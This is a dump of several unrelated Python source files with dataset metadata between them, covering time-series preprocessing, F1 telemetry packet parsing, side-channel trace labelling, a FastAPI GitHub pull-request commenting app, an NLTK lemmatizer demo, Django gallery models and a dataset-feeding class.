                data[columns] = (data[columns] - data[columns].min()) / (data[columns].max() - data[columns].min())  # to center around 0.0 subtract 0.5
            else:
                data = (data - data.min()) / (data.max() - data.min())  # to center around 0.0 subtract 0.5
return data
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def re_represent_data(self, current_representation, target_representation, data):
"""
Change representation of a data set.
:param current_representation:
:param target_representation:
:param data:
:return:
"""
raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)
@overrides
def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None):
"""
Apply a dimensionality reduction technique to a data set.
:param data:
:param mode:
:param reduced_column_name:
:param columns:
:return:
"""
try:
if data is None or mode is None or reduced_column_name is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'euclidean':
# Source:
# https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/
# https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8
# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html
reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative
old_index = data.index
data = pandas.concat([data, reduced], axis=1)
data = data.rename(columns={0: reduced_column_name})
data = data.reset_index(drop=True)
data = data.set_index(old_index)
return data
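            # Worked example for the 'euclidean' mode above: a row with
            # (acceleration_x, y, z) = (3, 4, 0) reduces to sqrt(9 + 16 + 0) = 5.0.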
if mode == 'manhatten':
                reduced = data[columns].abs().sum(axis=1)  # Manhattan norm: sum of absolute values
old_index = data.index
data = pandas.concat([data, reduced], axis=1)
data = data.rename(columns={0: reduced_column_name})
data = data.reset_index(drop=True)
data = data.set_index(old_index)
return data
if mode == 'pca':
# Source:
# https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe
# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names
# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html
# https://en.wikipedia.org/wiki/Principal_component_analysis
pca = PCA(n_components=1)
pca.fit(data[columns])
reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T))
reduced = reduced.rename(columns={0:reduced_column_name})
reduced = reduced.reset_index(drop=True)
old_index = data.index
data = data.reset_index(drop=True)
data = pandas.concat([data, reduced], axis=1)
data = data.set_index(old_index)
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def encode_categorical_features(self, data, mode, columns, encoding_function):
"""
Encode categorical features using an encoding function.
:param data:
:param mode:
:param columns:
:param encoding_function:
:return:
"""
try:
if data is None or mode is None or columns is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(
columns, list):
raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)
if mode == 'custom_function':
if encoding_function is None:
raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)
for column in columns:
data[column] = encoding_function(data[column])
return data
raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)
except (TypeError, NotImplementedError, ValueError):
self.logger.error(traceback.format_exc())
os._exit(1)
except Exception:
self.logger.error(traceback.format_exc())
os._exit(2)
@overrides
def inference_split_process(self, data, config, meta_data):
"""
Apply all preprocessing steps necessary for inference.
        :param data: pandas.DataFrame
        :param config: dict of preprocessing parameters
        :param meta_data: dict holding 'mean_train' and 'std_train'
        :return: pandas.DataFrame
"""
print('Fetch params')
acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]
freq = config['pre_proc_resample_freq'] # '1000ms'
mean_train = meta_data['mean_train']
std_train = meta_data['std_train']
print('Convert time unit, remove nans')
data = self.convert_unix_to_datetime(data, column='time', unit='ms')
data = self.remove_nans(data, replacement_mode='del_row')
data.set_index(data['time'], drop=True, inplace=True)
print('Resample')
data = self.resample_quantitative_data(data,
freq=freq) # 8000 1.25 Hz
print('Dimensionality reduction')
data = self.reduce_quantitativ_data_dimensionality(
data=data,
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
print('Normalizing, outlier removal')
selected_columns = ['acceleration_abs']
data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train)
data = self.remove_outliers_from_quantitative_data(
data,
replacement_mode='quantile',
columns=selected_columns,
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-1]
return data
@overrides
def training_split_process(self, data, config, labels):
"""
Apply all preprocessing steps necessary for training.
        :param data: pandas.DataFrame
        :param config: dict of preprocessing parameters
        :param labels: pandas.DataFrame of labels
        :return: data_train, mean_train, std_train, data_test, data_valid
"""
print('Fetch params')
#print(params)
test_sz = config['pre_proc_test_sz']
train_sz = config['pre_proc_training_sz']
valid_sz = config['pre_proc_validation_sz']
#acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z']
acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]]
selected_coarse_labels = config['pre_proc_movement_type_label'] #[5]
selected_road_labels = config['pre_proc_road_type_label'] #[1, 3]
freq = config['pre_proc_resample_freq'] #'1000ms'
print('Convert time unit, label data, remove nans')
data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms')
data = self.label_data(data, labels)
data = self.remove_nans(data, replacement_mode='del_row')
print('Train, Test, Validation split')
data_len = data.shape[0]
test_len = int(data_len * test_sz)
train_len = int(data_len * train_sz)
valid_len = int(data_len * valid_sz)
data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len)
data_test = data_test_valid.head(test_len)
data_valid = data_test_valid.tail(valid_len)
print('Segment by labels')
#Segment Train
car_train_segments = self.segment_data(data_train, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_train_segments = []
for car_segment in car_train_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_train_segments.append(road_segment)
#Segment Test
car_test_segments = self.segment_data(data_test, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_test_segments = []
for car_segment in car_test_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_test_segments.append(road_segment)
#Segment Valid
car_valid_segments = self.segment_data(data_valid, mode='labels',
label_column='coarse_label',
args=selected_coarse_labels)
data_valid_segments = []
for car_segment in car_valid_segments:
road_segments = self.segment_data(car_segment, mode='labels',
label_column='road_label',
args=selected_road_labels
)
for road_segment in road_segments:
data_valid_segments.append(road_segment)
print('Resample')
#Train
for ind in range(len(data_train_segments)):
data_train_segments[ind] = data_train_segments[ind].set_index('time')
data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind],
freq=freq) # 8000 1.25 Hz
#Test
for ind in range(len(data_test_segments)):
data_test_segments[ind] = data_test_segments[ind].set_index('time')
data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind],
freq=freq)
#Valid
for ind in range(len(data_valid_segments)):
data_valid_segments[ind] = data_valid_segments[ind].set_index('time')
data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind],
freq=freq)
print('Dimensionality reduction')
#Train
for ind in range(len(data_train_segments)):
data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_train_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
#Test
for ind in range(len(data_test_segments)):
data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_test_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
#Valid
for ind in range(len(data_valid_segments)):
data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality(
data=data_valid_segments[ind],
mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif
columns=acelerometer_columns,
reduced_column_name='acceleration_abs'
)
print('Normalizing, outlier removal')
#Train
selected_columns = ['acceleration_abs',
'road_label', 'id'] # 'acceleration_abs'
data_train = self.de_segment_data(data_train_segments, selected_columns)
data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2])
data_train = self.remove_outliers_from_quantitative_data(
data_train,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
#Test
data_test = self.de_segment_data(data_test_segments, selected_columns)
data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test,
selected_columns[:-2],
mean_train, std_train)
data_test = self.remove_outliers_from_quantitative_data(
data_test,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
#Valid
data_valid = self.de_segment_data(data_valid_segments, selected_columns)
data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid,
selected_columns[:-2],
mean_train, std_train)
data_valid = self.remove_outliers_from_quantitative_data(
data_valid,
replacement_mode='quantile',
columns=selected_columns[:-2],
quantile=0.99 # current run @0.95 for classical approach via TS Fresh
)[:-2]
data_train = data_train.loc[:, ~data_train.columns.duplicated()]
data_test = data_test.loc[:, ~data_test.columns.duplicated()]
data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()]
#print('Rolling mean smoothing')
#data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable
#data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)
#data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)
#data_train = self.remove_nans(data_train, replacement_mode='del_row')
#data_test = self.remove_nans(data_test, replacement_mode='del_row')
#data_valid = self.remove_nans(data_valid, replacement_mode='del_row')
#print(data_train.head(100))
return data_train, mean_train, std_train, data_test, data_valid | 2.6875 | 3 |
f1_telemetry/data/structs.py | pahansen/f1-2021-telemetry-dashboard | 1 | 12797534 | """Struct classes for car telemetry. Classes parse data from binary format and extract player data."""
import struct
import ctypes
from dataclasses import dataclass, asdict
from typing import List
PACKET_HEADER_FORMAT = "<HBBBBQfLBB"
PACKET_CAR_TELEMETRY_DATA_FORMAT = "BBb"
CAR_TELEMETRY_DATA_FORMAT = "HfffBbHBBHHHHHBBBBBBBBHffffBBBB"
LAP_DATA_FORMAT = "LLHHfffBBBBBBBBBBBBBBHHB"
CAR_STATUS_DATA_FORMAT = "BBBBBfffHHBBHBBBbfBfffB"
CAR_DAMAGE_DATA_FORMAT = "ffffBBBBBBBBBBBBBBBBBBBBBBB"
def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict:
"""Get single attributes from attributes list and allocate to position on car (fl, fr, rl, rr).
Args:
telemetry_values(list): List of telemetry values that should be mapped to attributes.
attribute_name(str): Attribute name used as keys in dict.
"""
car_position_mapping = ["rl", "rr", "fl", "fr"]
telemetry_values_dict = {}
for i, telemetry_value in enumerate(telemetry_values):
key_name = str(attribute_name) + "_" + car_position_mapping[i]
telemetry_values_dict[key_name] = telemetry_value
return telemetry_values_dict
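# Example: _telemetry_list_to_attributes([1, 2, 3, 4], 'm_tyresWear')
# -> {'m_tyresWear_rl': 1, 'm_tyresWear_rr': 2, 'm_tyresWear_fl': 3, 'm_tyresWear_fr': 4}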
@dataclass
class PacketHeader:
"""PacketHeader struct."""
m_packet_format: ctypes.c_uint16
m_game_major_version: ctypes.c_uint8
m_game_minor_version: ctypes.c_uint8
m_packet_version: ctypes.c_uint8
m_packet_id: ctypes.c_uint8
m_session_uid: ctypes.c_uint64
m_session_time: ctypes.c_float
m_frame_identifier: ctypes.c_uint32
m_player_car_index: ctypes.c_uint8
m_secondary_player_car_index: ctypes.c_uint8
@classmethod
def from_binary(cls, binary_message: str):
"""Create class form binary UDP package.
Args:
binary_message (str): Binary representation of package header.
"""
        unpacked = struct.unpack_from(PACKET_HEADER_FORMAT, binary_message)
return cls(
unpacked[0],
unpacked[1],
unpacked[2],
unpacked[3],
unpacked[4],
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[8],
unpacked[9],
)
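# Note: struct.calcsize(PACKET_HEADER_FORMAT) == 24, so the header occupies
# the first 24 bytes of every telemetry packet; per-car payloads follow it.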
@dataclass
class PacketWOAdditionalAttributes:
"""PacketCarStatusData struct."""
m_header: PacketHeader
@classmethod
def get_message_list(
cls,
packet_header: PacketHeader,
binary_message: str,
message_format: str,
message_type: object,
):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
# Unpack struct
unpacked = struct.unpack_from(
PACKET_HEADER_FORMAT + "".join(message_format * 22),
binary_message,
)
# Remove header from struct
unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]
# Get lap data for each active car
data_list = list()
for i in range(22):
data = message_type.from_unpacked(
unpacked_wo_header[
i * len(message_format) : (i + 1) * len(message_format)
]
)
data_list.append(data)
return data_list
@dataclass
class CarTelemetryData:
"""CarTelemetryData struct."""
m_speed: ctypes.c_uint16
m_throttle: ctypes.c_float
m_steer: ctypes.c_float
m_brake: ctypes.c_float
m_clutch: ctypes.c_uint8
m_gear: ctypes.c_int8
m_engine_rpm: ctypes.c_uint16
m_drs: ctypes.c_uint8
m_rev_lights_percent: ctypes.c_uint8
m_rev_lights_bit_value: ctypes.c_uint16
m_brakes_temperature: List[ctypes.c_uint16]
m_tyres_surface_temperature: List[ctypes.c_uint8]
m_tyres_inner_temperature: List[ctypes.c_uint8]
m_engine_temperature: ctypes.c_uint16
m_tyres_pressure: List[ctypes.c_float]
m_surface_type: List[ctypes.c_uint8]
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
attributes to construct CarTelemetryData class.
"""
return cls(
unpacked[0],
unpacked[1],
unpacked[2],
unpacked[3],
unpacked[4],
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[8],
unpacked[9],
list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]),
list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]),
list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]),
unpacked[22],
list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]),
list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]),
)
@dataclass
class PacketCarTelemetryData:
"""PacketCarTelemetryData struct."""
m_header: PacketHeader
m_car_telemetry_data: List[CarTelemetryData]
m_mfd_panel_index: ctypes.c_uint8
m_mfd_panel_index_secondary_player: ctypes.c_uint8
m_suggested_gear: ctypes.c_int8
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
# Unpack struct
unpacked = struct.unpack_from(
PACKET_HEADER_FORMAT
+ "".join(CAR_TELEMETRY_DATA_FORMAT * 22)
+ PACKET_CAR_TELEMETRY_DATA_FORMAT,
binary_message,
)
# Remove header from struct
unpacked_wo_header = unpacked[len(asdict(packet_header)) : :]
# Get telemetry for each active car
car_telemetry_data_list = list()
for i in range(22):
car_telemetry_data = CarTelemetryData.from_unpacked(
unpacked_wo_header[
i
* len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1)
* len(CAR_TELEMETRY_DATA_FORMAT)
]
)
car_telemetry_data_list.append(car_telemetry_data)
return cls(
packet_header,
car_telemetry_data_list,
unpacked_wo_header[-3],
unpacked_wo_header[-2],
unpacked_wo_header[-1],
)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_car_telemetry = self.m_car_telemetry_data[player_car_index]
player_telemetry_message = (
self.m_header.__dict__ | player_car_telemetry.__dict__.copy()
)
# Map tyre temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_surface_temperature"],
"m_tyres_surface_temperature",
)
)
player_telemetry_message.pop("m_tyres_surface_temperature")
# Map tyre inner temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_inner_temperature"],
"m_tyres_inner_temperature",
)
)
player_telemetry_message.pop("m_tyres_inner_temperature")
# Map brake temperature values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_brakes_temperature"],
"m_brakes_temperature",
)
)
player_telemetry_message.pop("m_brakes_temperature")
# Map tyres pressure values from list to attributes
player_telemetry_message = (
player_telemetry_message
| _telemetry_list_to_attributes(
player_telemetry_message["m_tyres_pressure"],
"m_tyres_pressure",
)
)
player_telemetry_message.pop("m_tyres_pressure")
player_telemetry_message.pop("m_surface_type")
return player_telemetry_message
@dataclass
class LapData:
"""LapData struct."""
m_lastLapTimeInMS: ctypes.c_uint32
m_currentLapTimeInMS: ctypes.c_uint32
m_sector1TimeInMS: ctypes.c_uint16
m_sector2TimeInMS: ctypes.c_uint16
    m_lapDistance: ctypes.c_float
m_currentLapNum: ctypes.c_uint8
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
            attributes to construct the LapData class.
"""
return cls(
unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8]
)
@dataclass
class PacketLapData(PacketWOAdditionalAttributes):
"""PacketCarTelemetryData struct."""
m_lap_data: List[LapData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
lap_data_list = cls.get_message_list(
packet_header, binary_message, LAP_DATA_FORMAT, LapData
)
return cls(packet_header, lap_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_values = (
self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy()
)
return player_values
@dataclass
class CarStatusData:
"""CarStatusData struct."""
m_fuelInTank: ctypes.c_float
m_fuelCapacity: ctypes.c_float
m_fuelRemainingLaps: ctypes.c_float
m_actualTyreCompound: ctypes.c_uint8
m_tyresAgeLaps: ctypes.c_uint8
m_ersStoreEnergy: ctypes.c_float
m_ersDeployMode: ctypes.c_uint8
m_ersHarvestedThisLapMGUK: ctypes.c_float
m_ersHarvestedThisLapMGUH: ctypes.c_float
m_ersDeployedThisLap: ctypes.c_float
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
            attributes to construct the CarStatusData class.
"""
return cls(
unpacked[5],
unpacked[6],
unpacked[7],
unpacked[13],
unpacked[15],
unpacked[17],
unpacked[18],
unpacked[19],
unpacked[20],
unpacked[21],
)
@dataclass
class PacketCarStatusData(PacketWOAdditionalAttributes):
"""PacketCarStatusData struct."""
m_carStatusData: List[CarStatusData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
car_status_data_list = cls.get_message_list(
packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData
)
return cls(packet_header, car_status_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_values = (
self.m_header.__dict__
| self.m_carStatusData[player_car_index].__dict__.copy()
)
return player_values
@dataclass
class CarDamageData:
"""CarStatusData struct."""
    m_tyresWear: List[ctypes.c_float]
    m_tyresDamage: List[ctypes.c_uint8]
    m_brakesDamage: List[ctypes.c_uint8]
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
            attributes to construct the CarDamageData class.
"""
return cls(
list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]),
list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]),
list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]),
)
@dataclass
class PacketCarDamageData(PacketWOAdditionalAttributes):
"""PacketCarStatusData struct."""
m_carDamageData: List[CarDamageData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
car_damage_data_list = cls.get_message_list(
packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData
)
return cls(packet_header, car_damage_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_car_damage = self.m_carDamageData[player_car_index]
player_car_damage_message = (
self.m_header.__dict__ | player_car_damage.__dict__.copy()
)
# Map tyre wear values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_tyresWear"],
"m_tyresWear",
)
)
player_car_damage_message.pop("m_tyresWear")
# Map tyre damage values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_tyresDamage"],
"m_tyresDamage",
)
)
player_car_damage_message.pop("m_tyresDamage")
# Map brake damage values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_brakesDamage"],
"m_brakesDamage",
)
)
player_car_damage_message.pop("m_brakesDamage")
return player_car_damage_message
| 2.9375 | 3 |
src/trace_set/transform.py | ccberg/LA | 1 | 12797535 | <filename>src/trace_set/transform.py
import numpy as np
from src.dlla.hw import prepare_traces_dl
from tensorflow.python.keras.utils.np_utils import to_categorical
# TODO replace with mlp_hw notebook variants
from src.tools.dl import encode
from src.tools.la import balance
from src.trace_set.database import Database
from src.trace_set.pollution import PollutionType, Pollution
from src.trace_set.set_hw import TraceSetHW
def reduce_fixed_fixed(x, y, balanced=False):
"""
Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes.
"""
hamming_weight = np.argmax(y, axis=1)
filter_ixs = hamming_weight != 4
is_high = hamming_weight[filter_ixs] > 4
traces, la_bit = x[filter_ixs], is_high
if balanced:
traces, la_bit = balance(traces, la_bit)
return traces, encode(la_bit, 2)
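# Sketch: if argmax(y) over rows gives HW classes [3, 4, 7], the HW == 4 trace
# is dropped and the rest become binary labels [0 (low), 1 (high)] before
# one-hot encoding via `encode`.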
def reduce_fixed_random(x, y, balanced=False):
"""
Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and random.
"""
hamming_weight = np.argmax(y, axis=1)
is_random = np.random.binomial(1, .5, len(x)).astype(bool)
filter_ixs = np.logical_or(hamming_weight < 4, is_random)
traces, la_bit = x[filter_ixs], is_random[filter_ixs]
if balanced:
traces, la_bit = balance(traces, la_bit)
return traces, encode(la_bit, 2)
if __name__ == '__main__':
trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000))
x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack())
x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True)
print(x2) | 2.234375 | 2 |
app/api/index.py | awtkns/openapi-perf-action | 0 | 12797536 | import os
from fastapi import FastAPI, HTTPException
from github3.exceptions import NotFoundError, ForbiddenError
from github3.github import GitHub
from github3.pulls import PullRequest
from pydantic import BaseModel
GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)
GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)
if not GITHUB_PRIVATE_KEY:
GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()
app = FastAPI()
class ActionIn(BaseModel):
content: str
owner: str
repository: str
pr_number: int
@property
def repo(self) -> str:
return f'{self.owner}/{self.repository}'
@app.post('/comment')
def comment_on_pr(action: ActionIn):
gh = login_as_installation(action)
get_pr(gh, action).create_comment(action.content)
return "Post Success", 200
@app.post('/reaction')
def react_to_pr(action: ActionIn):
gh = login_as_installation(action)
issue = get_pr(gh, action).issue()
issue._post(
issue._api + '/reactions',
data={"content": action.content},
headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}
)
return "Post Success", 200
def login_as_installation(action: ActionIn):
try:
gh = GitHub()
gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)
install = gh.app_installation_for_repository(action.owner, action.repository)
gh.login_as_app_installation(
GITHUB_PRIVATE_KEY.encode(),
GITHUB_APP_IDENTIFIER,
install.id
)
return gh
except NotFoundError:
raise HTTPException(404, f"OpeAPI Perf App not installed to {action.repo}")
def get_pr(gh, action: ActionIn) -> PullRequest:
try:
return gh.pull_request(
owner=action.owner,
repository=action.repository,
number=action.pr_number
)
except ForbiddenError:
raise HTTPException(403, f"Application not setup for the repository {action.repo}")
except NotFoundError:
raise HTTPException(404, f"PR #{action.pr_number} does not exist in {action.repo}")
| 2.21875 | 2 |
ml_scraping/src/NLTK/tutorial/lemmatizing.py | josetorrs/thee-flying-chicken | 2 | 12797537 | from nltk.stem import WordNetLemmatizer
lemmatizer = WordNetLemmatizer()
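# Note: the WordNet corpus must be available locally, e.g. via
# nltk.download('wordnet'), before lemmatize() can be used.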
'''
print(lemmatizer.lemmatize("cacti"))
print(lemmatizer.lemmatize("geese"))
print(lemmatizer.lemmatize("rocks"))
print(lemmatizer.lemmatize("python"))
'''
# default pos="n" (noun)
# "a" = adjective, "v" = verb
# lemmas give back actual words, usually better than stemmers
print(lemmatizer.lemmatize("better", pos="a"))
print(lemmatizer.lemmatize("best", pos="a"))
print(lemmatizer.lemmatize("run", pos="v"))
print(lemmatizer.lemmatize("run"))
| 3.4375 | 3 |
portfolio/models.py | Marcos8060/Django-Gallery-Website | 0 | 12797538 | from django.urls import reverse
from django.db import models
# Create your models here
class Location(models.Model):
name = models.CharField(max_length=60)
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('gallery_list',args=[self.slug])
class Image(models.Model):
location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location
category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category
name= models.CharField(max_length=200)
description = models.TextField(max_length=300)
image = models.ImageField(upload_to = 'articles/',blank=True)
def get_absolute_url(self):
return reverse('gallery_detail',args=[self.id])
| 2.609375 | 3 |
diplomacy_research/models/datasets/feedable_dataset.py | wwongkamjan/dipnet_press | 39 | 12797539 | <filename>diplomacy_research/models/datasets/feedable_dataset.py
# ==============================================================================
# Copyright 2019 - <NAME>
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Feedable Dataset
- Abstract class responsible for feeding data inside a model
"""
from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField
from diplomacy_research.utils.model import pad_list
# Constants
LOGGER = logging.getLogger(__name__)
class FeedableDataset(metaclass=ABCMeta):
""" This object is a generic feedable dataset """
def __init__(self, dataset_builder, cluster_config=None):
""" Constructor
:param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods
:param cluster_config: Optional. If set, the cluster configuration will be used for distributed training.
:type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder
:type cluster_config: diplomacy_research.utils.cluster.ClusterConfig
"""
self.dataset_builder = dataset_builder
self.cluster_config = cluster_config
self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields)
self.default_features = {} # Will be used as default if features are missing
self.session = None
self.iterator = None
self._is_started = False
self._is_initialized = False
self._is_closing = False
def __del__(self):
""" Destructor """
self.close()
@property
def can_support_iterator(self):
""" Determines if the dataset can support an iterator or if it is a remote (RPC) dataset """
raise NotImplementedError()
@property
def is_started(self):
""" Determines if the dataset has been started """
return self._is_started
@property
def is_initialized(self):
""" Determines if the iterator is initialized """
return self._is_initialized
@property
def is_closing(self):
""" Determines if the dataset is closing """
return self._is_closing
@abstractmethod
def build(self):
""" Builds the dataset """
raise NotImplementedError()
@abstractmethod
def start(self, session):
""" Starts the dataset
:param session: The TensorFlow session to use.
:type session: tensorflow.python.client.session.Session
"""
raise NotImplementedError()
@abstractmethod
def initialize(self, session):
""" Initializes the dataset (and its iterator)
:param session: The TensorFlow session to use.
:type session: tensorflow.python.client.session.Session
"""
raise NotImplementedError()
def get_feedable_item(self, *args, **kwargs):
""" Calls the dataset_builder get_feedable_item """
return self.dataset_builder.get_feedable_item(*args, **kwargs)
def prepare_item(self, item):
""" Makes sure the item respects the required protofields and casts/pads the item accordingly """
